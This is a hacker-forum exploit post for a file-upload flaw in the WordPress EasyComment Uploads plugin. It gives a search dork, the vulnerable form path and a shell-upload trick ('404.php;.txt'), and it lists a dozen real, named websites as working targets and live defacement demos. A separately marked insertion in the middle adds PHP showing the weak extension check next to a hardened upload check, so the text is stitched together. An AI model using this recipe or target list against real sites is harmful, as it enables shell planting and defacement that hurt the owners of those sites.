Deface WP (extensions jpg, txt, bmp, gif)
----------------------------------------------------------------------------
| Title : WordPress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/eas ... t-uploads/
| Email : me@zonedevil.om
| Date : 15/06/2011
| Dork : "/easy-comment-uploads/upload-form.php"
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Fedora, PCLinuxOS]
----------------------------------------------------------------------------
*_Exploit_*
# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php
Working examples:
http://accentspaintingplus.com/wp-conten...d-form.php
http://eleventigers.net/111/wp-content/p...d-form.php
http://infusiondesigns.us/grubby/wp-cont...d-form.php
# File Extension [.txt],[.jpg],[gif],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# example: site/wp-content/uploads/2011/06/404.php;.txt
In detail: situsnya.com/wp-content/uploads/2011/06/namafilekamu.txt
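The advisory above rests on two weaknesses: the upload form accepts a file on the strength of the client-supplied name alone (so a name like `404.php;.txt` passes as "txt"), and the stored file then sits at a path that is predictable from the year and month. As an added example, not part of the original post and not the plugin's own code, here is that extension-only check beside a hardened upload check in PHP. The function names, the `$_FILES`-style `$file` array and `$upload_dir` are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Function names, the $_FILES-style array
// and the upload directory are assumptions for illustration.

// WEAK: decides on the client-supplied name alone and only looks at the last
// extension, so a name such as "404.php;.txt" is accepted as "txt".
function weak_is_allowed(string $filename): bool
{
    $allowed = ['txt', 'jpg', 'gif', 'bmp'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true);
}

// HARDENED: allowlist the extension, require exactly one dot and no separators
// or semicolons, verify the real content type, and discard the user's name.
// Returns the server-chosen target path, or null if the upload is rejected.
function hardened_upload_target(array $file, string $upload_dir): ?string
{
    // Extension -> MIME types libmagic reports for it (BMP varies by version)
    $allowed = [
        'jpg' => ['image/jpeg'],
        'gif' => ['image/gif'],
        'bmp' => ['image/bmp', 'image/x-ms-bmp'],
        'txt' => ['text/plain'],
    ];

    if (!isset($file['name'], $file['tmp_name'], $file['error'])
        || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    $orig = basename($file['name']);
    // Exactly one dot (rejects "a.php.txt" and "404.php;.txt"), and no path
    // separators, semicolons or NUL bytes anywhere in the name
    if (substr_count($orig, '.') !== 1 || preg_match('/[\/\\\\;\x00]/', $orig)) {
        return null;
    }

    $ext = strtolower(pathinfo($orig, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }

    // Content check on the bytes via libmagic; never trust $file['type'],
    // which the client sets
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, $allowed[$ext], true)) {
        return null;
    }
    // Images must additionally parse as images
    if ($ext !== 'txt' && @getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // Random, server-chosen name: the original name never reaches the
    // filesystem and the stored path is no longer predictable to the uploader
    return rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}
```

Inside WordPress a plugin should hand the file to `wp_handle_upload()` rather than moving it itself, since that applies the site's own MIME allowlist; independently of the check, serving `wp-content/uploads` with script execution disabled limits what an uploaded file can do if a check is ever bypassed.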
=========================================================
Live Demo :
//---------------------------------------------------------------------------------\\
- http://www.recycledbride.com/blog/wp-content/uploads/2011/06/n4is3n.txt
- http://www.mysodes.tv/wp-content/uploads/2011/06/n4is3n.txt
- http://objekt.com.au/wp-content/uploads/2011/06/n4is3n.txt
- http://h00rj.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.chetthedog.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.punjabicomments.co.cc/wp-content/uploads/2011/06/n4is3n.txt
- http://bgprogression.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.deathvalleymag.com/wp-content/uploads/2011/06/n4is3n.txt
- http://www.serpholicmedia.com/wp-content/uploads/2011/06/n4is3n.txt
- http://maratona.mobi/wp-content/uploads/2011/06/n4is3n.txt
//---------------------------------------------------------------------------------\\